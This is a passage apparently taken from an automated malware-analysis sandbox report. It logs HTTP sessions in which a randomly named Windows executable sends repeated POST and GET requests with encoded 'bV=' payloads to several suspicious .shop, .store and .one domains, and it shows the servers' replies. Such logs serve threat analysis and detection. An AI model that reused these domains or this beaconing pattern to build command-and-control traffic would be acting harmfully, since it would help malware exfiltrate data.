                                                                                                                  Data Raw: 62 56 3d 45 4b 47 44 2b 46 4e 56 6b 2b 47 4f 4d 78 48 54 6f 4e 57 32 6f 39 58 7a 2b 6d 46 50 59 7a 72 57 6b 57 35 64 50 69 73 62 76 49 57 2f 43 36 2f 43 6c 78 52 2b 34 45 6a 30 74 77 4e 6c 4c 52 63 53 51 47 54 36 36 7a 53 35 44 54 58 43 49 33 58 4d 38 62 73 77 6d 77 70 78 50 39 4d 46 52 59 4a 53 4f 55 66 30 66 66 54 39 37 78 73 57 43 48 43 45 77 32 68 6c 52 66 4d 77 50 57 47 49 33 79 66 56 32 2b 54 65 61 51 5a 56 4a 4d 68 71 43 49 68 4a 79 73 6e 4a 78 38 61 68 4a 51 52 68 33 2f 43 73 72 4e 53 44 7a 74 39 41 57 56 49 53 52 33 79 42 5a 35 71 49 49 38 4c 58 52 48 6c 38 33 31 47 64 72 49 35 67 56 6b 6e 2f 37 67 65 2f 47 34 63 4e 47 47 46 56 75 4d 78 6a 2b 67 65 42 45 38 34 48 6d 37 4d 42 51 42 74 69 69 58 37 2b 38 57 36 35 33 52 74 76 6a 50 56 35 32 4f 4c 73 6b 63 45 6f 31 78 58 41 4e 36 47 49 43 30 58 67 41 36 4c 50 78 4f 65 68 7a 58 75 61 71 46 41 46 4f 72 34 4e 72 6e 4b 44 66 71 6b 42 6d 32 45 50 2b 68 45 62 50 56 4a 75 36 46 31 56 36 75 6e 4f 71 4c 42 56 33 65 45 35 30 42 35 52 35 44 6b 37 70 72 49 [TRUNCATED]
                                                                                                                  Data Ascii: bV=EKGD+FNVk+GOMxHToNW2o9Xz+mFPYzrWkW5dPisbvIW/C6/ClxR+4Ej0twNlLRcSQGT66zS5DTXCI3XM8bswmwpxP9MFRYJSOUf0ffT97xsWCHCEw2hlRfMwPWGI3yfV2+TeaQZVJMhqCIhJysnJx8ahJQRh3/CsrNSDzt9AWVISR3yBZ5qII8LXRHl831GdrI5gVkn/7ge/G4cNGGFVuMxj+geBE84Hm7MBQBtiiX7+8W653RtvjPV52OLskcEo1xXAN6GIC0XgA6LPxOehzXuaqFAFOr4NrnKDfqkBm2EP+hEbPVJu6F1V6unOqLBV3eE50B5R5Dk7prIDejM0DxRGwOiLlNCYJpWEAOEDiv8hYAzOpeNk9unblGqJ9cvHReEoy5WbLeX1ZatjB3ZQ2OUIEFy5LNmwtqcFRwtSFrRSZervdbqRxDAztG8VHFhnepvC4WC66njquvPOScQANscZeHUAQM1AaUbFuX4ZQLx9ivbc7BDGfMUHQBhu5XwCbV9DXcrIXZlnA5sD/o8JPVh4cbdnHnStNZVSciHQy/bN1GEvzH4WNbtZ0mzGOkfvXYP9SjzGFwOtvgSpBtsN0SGH+S2nB9KmHXZ54Hb9mqOkQOsaLEKXXvC4qARgDAae0exJ0EvhZZ0qeFk2xweRzfKGtzQKU3ROSlrsD5vEULYzvVSp9qvFucOiW0RH7d9xBo88XetfXe0RrNkPN+cIYnCgsWYYu47EVsmD1r4a12WvdEr3IBtksJvBXJsL28JCUfXUhqmIXjOVGHOUPbDis/GQBiskWY+W4nPDIrywjMtQY/99CwRVh7zyQq/jU8/xa3zBPTgfD2vEUivzByNvbRAH85dcraOLwEQh/Y7oCOO5b+eNGA/1S4krjsQyt+YQh9wZYuEqnKFP5E6ZwsyYHo21+cRQEFMqP+B7BBa01WAmUYPq0pmE7XV03aiG1Z4XYuUm67Ok9bijEqfaC5F2eaidGKg8gFilISdhR4ESHWZ7k+SnE [TRUNCATED]
                                                                                                                  Dec 2, 2024 15:26:21.889749050 CET691INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 02 Dec 2024 14:26:21 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 548
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  40192.168.2.55001643.205.198.2980728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:26:23.029009104 CET503OUTGET /j8pv/?bV=JIuj9wxSnK6mEyWHgqme9cDOp2JPGD2avn5HAjA8ht24L6v+vQ9uqWv6ig59Dwg+VmGSo2u3Iy71OFL1070b7jwAWfgjYo1ceHXmQsmagjo2PVHkyEcMWf8OCye8gCuDoA==&wzcP=iLdd HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Connection: close
                                                                                                                  Host: www.1secondlending.one
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Dec 2, 2024 15:26:24.548451900 CET691INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 02 Dec 2024 14:26:24 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 548
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  41192.168.2.550017172.67.187.11480728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:26:30.085380077 CET762OUTPOST /swhs/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Connection: close
                                                                                                                  Host: www.zkdamdjj.shop
                                                                                                                  Origin: http://www.zkdamdjj.shop
                                                                                                                  Referer: http://www.zkdamdjj.shop/swhs/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 78 7a 33 56 47 6e 4e 36 59 4a 49 2b 37 78 49 2b 45 65 4b 55 64 49 43 74 4e 67 31 32 6d 61 62 6e 6a 41 66 6d 32 2f 75 75 2f 56 77 59 6b 43 44 53 70 68 37 52 2b 74 4a 51 48 36 72 6d 7a 49 6a 51 78 52 47 67 4b 6c 34 37 42 63 4c 4d 68 6e 55 4b 44 57 66 62 51 56 6f 6a 52 67 44 7a 59 50 6d 4c 62 30 6c 54 63 50 69 41 65 31 37 75 6d 59 6d 52 62 67 4f 6a 69 61 70 35 77 61 4c 4b 72 35 6b 50 68 4d 4d 35 70 69 39 7a 67 36 6c 6c 5a 34 77 36 67 34 44 2b 4e 55 56 70 77 68 67 50 49 53 59 35 38 76 6d 70 68 63 30 51 33 72 41 5a 59 56 6f 30 32 4d 64 6d 37 64 48 4e 68 64 51 46 6e 54 7a 6d 36 41 32 35 51 37 73 3d
                                                                                                                  Data Ascii: bV=xz3VGnN6YJI+7xI+EeKUdICtNg12mabnjAfm2/uu/VwYkCDSph7R+tJQH6rmzIjQxRGgKl47BcLMhnUKDWfbQVojRgDzYPmLb0lTcPiAe17umYmRbgOjiap5waLKr5kPhMM5pi9zg6llZ4w6g4D+NUVpwhgPISY58vmphc0Q3rAZYVo02Mdm7dHNhdQFnTzm6A25Q7s=


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  42192.168.2.550018172.67.187.11480728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:26:32.757044077 CET782OUTPOST /swhs/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Connection: close
                                                                                                                  Host: www.zkdamdjj.shop
                                                                                                                  Origin: http://www.zkdamdjj.shop
                                                                                                                  Referer: http://www.zkdamdjj.shop/swhs/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 78 7a 33 56 47 6e 4e 36 59 4a 49 2b 70 68 34 2b 4a 66 4b 55 55 49 43 75 43 41 31 32 39 4b 62 72 6a 41 62 6d 32 2b 71 2b 2f 47 59 59 71 41 72 53 6f 67 37 52 35 74 4a 51 54 71 72 6a 38 6f 6a 48 78 52 36 43 4b 68 34 37 42 63 50 4d 68 69 51 4b 43 68 6a 59 66 6c 6f 39 64 41 44 78 47 2f 6d 4c 62 30 6c 54 63 50 33 74 65 30 54 75 6d 70 57 52 5a 42 4f 69 72 36 70 34 7a 61 4c 4b 76 35 6b 4c 68 4d 4d 48 70 6a 52 5a 67 2f 68 6c 5a 38 30 36 75 4a 44 35 59 45 56 77 6f 42 68 37 41 51 77 39 6b 63 4f 58 69 65 31 77 72 4c 35 6a 55 44 5a 65 73 75 56 4f 6f 39 72 31 78 4f 59 79 32 6a 53 50 67 6a 6d 4a 4f 73 37 39 66 31 33 74 66 33 4d 66 4e 4e 45 59 6b 6b 48 76 4f 4b 77 63
                                                                                                                  Data Ascii: bV=xz3VGnN6YJI+ph4+JfKUUICuCA129KbrjAbm2+q+/GYYqArSog7R5tJQTqrj8ojHxR6CKh47BcPMhiQKChjYflo9dADxG/mLb0lTcP3te0TumpWRZBOir6p4zaLKv5kLhMMHpjRZg/hlZ806uJD5YEVwoBh7AQw9kcOXie1wrL5jUDZesuVOo9r1xOYy2jSPgjmJOs79f13tf3MfNNEYkkHvOKwc


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  43192.168.2.550019172.67.187.11480728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:26:35.424570084 CET1799OUTPOST /swhs/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Connection: close
                                                                                                                  Host: www.zkdamdjj.shop
                                                                                                                  Origin: http://www.zkdamdjj.shop
                                                                                                                  Referer: http://www.zkdamdjj.shop/swhs/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 78 7a 33 56 47 6e 4e 36 59 4a 49 2b 70 68 34 2b 4a 66 4b 55 55 49 43 75 43 41 31 32 39 4b 62 72 6a 41 62 6d 32 2b 71 2b 2f 41 41 59 71 78 4c 53 70 44 44 52 34 74 4a 51 4d 61 72 69 38 6f 6a 61 78 52 53 47 4b 68 39 4d 42 65 48 4d 68 41 59 4b 4c 31 33 59 49 31 6f 39 56 67 44 79 59 50 6e 52 62 30 56 58 63 50 6e 74 65 30 54 75 6d 71 4f 52 64 51 4f 69 74 36 70 35 77 61 4c 47 72 35 6b 76 68 4e 6c 38 70 6a 56 6a 67 4d 5a 6c 63 73 6b 36 69 62 72 35 46 30 56 79 72 42 68 6a 41 51 74 6a 6b 64 6a 6b 69 66 42 57 72 49 70 6a 51 69 6b 65 75 61 56 75 72 50 48 4c 36 63 41 35 73 44 57 35 6c 6c 75 37 47 62 58 4a 63 6b 7a 68 56 33 73 76 5a 66 35 38 79 54 48 46 4f 64 52 55 6f 6b 4c 6f 51 77 43 6c 6e 32 4a 76 4f 65 48 49 67 6e 55 50 67 63 44 63 4c 78 47 76 32 49 39 45 79 32 56 61 49 74 69 59 68 31 66 76 4f 41 55 65 49 57 6f 48 5a 54 45 4d 4b 5a 46 34 7a 62 45 44 4d 2f 37 77 46 71 4e 6e 4b 44 72 48 72 70 37 6c 4a 74 6f 35 33 59 36 39 6f 56 67 2b 74 2b 68 51 71 4c 50 57 31 75 70 75 32 76 50 32 55 2b 4a 74 58 56 51 [TRUNCATED]
                                                                                                                  Data Ascii: bV=xz3VGnN6YJI+ph4+JfKUUICuCA129KbrjAbm2+q+/AAYqxLSpDDR4tJQMari8ojaxRSGKh9MBeHMhAYKL13YI1o9VgDyYPnRb0VXcPnte0TumqORdQOit6p5waLGr5kvhNl8pjVjgMZlcsk6ibr5F0VyrBhjAQtjkdjkifBWrIpjQikeuaVurPHL6cA5sDW5llu7GbXJckzhV3svZf58yTHFOdRUokLoQwCln2JvOeHIgnUPgcDcLxGv2I9Ey2VaItiYh1fvOAUeIWoHZTEMKZF4zbEDM/7wFqNnKDrHrp7lJto53Y69oVg+t+hQqLPW1upu2vP2U+JtXVQv6UqoEghRlfUuo7n9v6eQQwKaIhFrFCEFbqwY0RptFWhGJAg8fuli+cL09MYJ1MgxVzAGhfTBCnLKT+0ol2yQKBRjqSj2OFepFOqfRMIwSPJpzke17VBiT1IwicGIjJN/6/uOXBbuoZXRPLiZBZtMK8U/I19/iQby9l683Zln1A9/jOXOAo4FAkv2pQGExfPrrC1eeJe6k8PK4wjiFGnjkC5pPYY7Mmzfb5185i2M15W3LnMq8WQUaXmdY/zFg2vAsmk0hVewoul3mvrJHvBgVPpkf+tFvlIfjrBv/hLLrwpr7ONszcwuSTHYNsF3gQGXOebmSfS098myr3FJKTCxDml23Dg99Fec+jgK1cq8FkM1+xfnQn1LNJ4eT5JX+lFpT0nLBj9ib5try1ZMI4G481yjmxYR9PQAlhSevmpgevMdahZ6Ar8F0IPeRadev3ovL2f5yZrb2rOBLwGwKDz9kZL1+3yQPFyEA/SjN31E7+mIvi4zmk4O2wVK5k5NJaiKh78c29bDRko/9TdMA9er/xasZ9tU2fQL7cfYGHxX/evafUnASoq2qhlrYKgV5AsVljx2HZLgqu/nFw/whQ9D7vP8R2WzXK+QcozSODTi/aGaHQp7nifB0z5tCqKwEZbLfuBl03G+jC/8V/JX6MZhNM2dTiezO84gf [TRUNCATED]


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  44192.168.2.550020172.67.187.11480728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:26:38.090502977 CET498OUTGET /swhs/?bV=8xf1FTtyUpYkrTYPPLWUAP++SxZR47Hqllrz0dKQmws7hy/+lCnqv8MjCvT/8dHN8wn+YkpcLfbwvxo0J0bTQ0tlUhCAXdO2W2lcbMXoQ37jkanwSyGhs5UT/ITwg7la8g==&wzcP=iLdd HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Connection: close
                                                                                                                  Host: www.zkdamdjj.shop
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Dec 2, 2024 15:26:40.067817926 CET1236INHTTP/1.1 301 Moved Permanently
                                                                                                                  Date: Mon, 02 Dec 2024 14:26:39 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                  x-redirect-by: WordPress
                                                                                                                  location: https://zkdamdjj.shop/swhs/?bV=8xf1FTtyUpYkrTYPPLWUAP++SxZR47Hqllrz0dKQmws7hy/+lCnqv8MjCvT/8dHN8wn+YkpcLfbwvxo0J0bTQ0tlUhCAXdO2W2lcbMXoQ37jkanwSyGhs5UT/ITwg7la8g==&wzcP=iLdd
                                                                                                                  x-litespeed-cache-control: public,max-age=3600
                                                                                                                  x-litespeed-tag: 02a_HTTP.404,02a_HTTP.301,02a_404,02a_URL.9b9a69d1fac6b11918e507384a598f21,02a_
                                                                                                                  x-litespeed-cache: miss
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kgGTpWoDKrA7VpoHDrZqfRAfI98VPZVGBQ0fVLU9sGIm6LhpA6F6PcCu%2FDsVSV5qesabDAbx2XcT0l%2F3cOL7%2BPhdrxdFjPLOtyybJNWKIZ7mDeBkyIWREgnFPb%2Fd2Zqc%2B9kLhg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8ebbfe423c8043b7-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1580&rtt_var=790&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=498&delivery_rate=0&cwnd=234&unsent_b
                                                                                                                  Data Raw:
                                                                                                                  Data Ascii:
                                                                                                                  Dec 2, 2024 15:26:40.067833900 CET45INData Raw: 74 65 73 3d 30 26 63 69 64 3d 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: tes=0&cid=0000000000000000&ts=0&x=0"0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  45192.168.2.550021172.67.167.14680728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:26:45.688560963 CET774OUTPOST /8gp4/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Connection: close
                                                                                                                  Host: www.rgenerousrs.store
                                                                                                                  Origin: http://www.rgenerousrs.store
                                                                                                                  Referer: http://www.rgenerousrs.store/8gp4/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 49 47 32 35 56 54 46 35 52 72 45 44 67 52 4d 2f 37 79 53 54 38 2b 49 37 67 35 48 68 56 4f 68 4c 79 62 38 45 31 2b 77 52 59 51 42 7a 2b 44 59 41 4d 76 65 77 71 32 6f 48 78 34 38 4a 67 73 46 48 49 36 4f 6b 30 37 72 69 50 69 6b 57 70 33 65 54 39 4b 65 38 48 6c 76 55 4f 6e 70 71 78 52 78 65 45 4c 44 58 34 30 56 6d 41 7a 63 4f 61 65 2b 65 66 6a 46 57 67 38 53 79 66 6b 42 35 39 57 59 6e 54 70 71 47 4d 44 63 48 39 41 68 77 62 74 57 65 71 61 76 79 35 42 35 42 78 2f 74 74 5a 36 35 53 32 4c 46 52 30 49 37 7a 4b 66 44 6b 34 42 2f 57 2f 73 4d 59 6e 55 34 30 51 67 4a 4e 64 73 32 41 56 50 4c 75 78 59 55 3d
                                                                                                                  Data Ascii: bV=IG25VTF5RrEDgRM/7yST8+I7g5HhVOhLyb8E1+wRYQBz+DYAMvewq2oHx48JgsFHI6Ok07riPikWp3eT9Ke8HlvUOnpqxRxeELDX40VmAzcOae+efjFWg8SyfkB59WYnTpqGMDcH9AhwbtWeqavy5B5Bx/ttZ65S2LFR0I7zKfDk4B/W/sMYnU40QgJNds2AVPLuxYU=
                                                                                                                  Dec 2, 2024 15:26:47.272048950 CET1100INHTTP/1.1 404 Not Found
                                                                                                                  Date: Mon, 02 Dec 2024 14:26:47 GMT
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q999qeSC8rjum2VgqBSdrdB5hrZyxQ9k3wIitk0%2Bq%2BUmuicI%2FGUNZtzB%2ByyALXbC%2BlFu97B3Cmc62QK5iyb6PSzYefJbmUUpBE9ElfS4bJ5vZ6bMzPbhrA0Xg2DFjoBwq1JEuzAR%2Fj8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8ebbfe719a1919b6-EWR
                                                                                                                  Content-Encoding: gzip
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1827&min_rtt=1827&rtt_var=913&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=774&delivery_rate=0&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  46192.168.2.550022172.67.167.14680728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:26:48.347707033 CET794OUTPOST /8gp4/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Connection: close
                                                                                                                  Host: www.rgenerousrs.store
                                                                                                                  Origin: http://www.rgenerousrs.store
                                                                                                                  Referer: http://www.rgenerousrs.store/8gp4/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
